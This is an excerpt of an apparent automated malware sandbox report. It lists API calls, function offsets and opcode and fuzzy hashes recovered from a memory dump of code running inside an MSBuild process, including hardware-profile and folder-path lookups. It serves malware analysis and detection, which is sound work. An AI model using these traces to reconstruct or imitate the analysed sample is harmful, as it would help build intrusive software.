                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileOperation
                                                                                          • String ID: ^qA
                                                                                          • API String ID: 3080627654-2929517337
                                                                                          • Opcode ID: 16d3a2ce8468c8175a4b0748f848a8e721ac03b0a06bcb47fc2447d8941ceac4
                                                                                          • Instruction ID: 1eaf247a329aa75c86d9425b1c51e37de0b4722cea675766f58cecf8dc0fcae1
                                                                                          • Opcode Fuzzy Hash: 16d3a2ce8468c8175a4b0748f848a8e721ac03b0a06bcb47fc2447d8941ceac4
                                                                                          • Instruction Fuzzy Hash: 68E075B0E0421D9FCB44EFA4D5466EEBBF8FF48308F40806AD919F7240E7B456458BA9
                                                                                          APIs
                                                                                          • GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentProfile
                                                                                          • String ID: Unknown
                                                                                          • API String ID: 2104809126-1654365787
                                                                                          • Opcode ID: 36caf4ab5cc3db7ce453f452f44e3bfd2793be26340c29108ddef0f291e38d6b
                                                                                          • Instruction ID: 7df7fbcbbed776e4458085ee5b54356bf3053a549426d159850edd6d89fd8832
                                                                                          • Opcode Fuzzy Hash: 36caf4ab5cc3db7ce453f452f44e3bfd2793be26340c29108ddef0f291e38d6b
                                                                                          • Instruction Fuzzy Hash: D6E0C270A0010DFBDB10EBA4DA85FDD37BC6B04348F508125A601E3180DBBCE648CBA9
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0040D3FF
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                            • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 2625060131-0
                                                                                          • Opcode ID: 376a3a712f82bb87cd6dc28791a904098dcfe9595fc6229afb21645f8f31d16a
                                                                                          • Instruction ID: c334b669d827ce9460b6e052bb784494c4e07a697f8de2f8e66076f210601346
                                                                                          • Opcode Fuzzy Hash: 376a3a712f82bb87cd6dc28791a904098dcfe9595fc6229afb21645f8f31d16a
                                                                                          • Instruction Fuzzy Hash: 63915F71D0024CEACF11EBE5D952BDEBBB8AF14308F10417EE44573282DA78570C8B66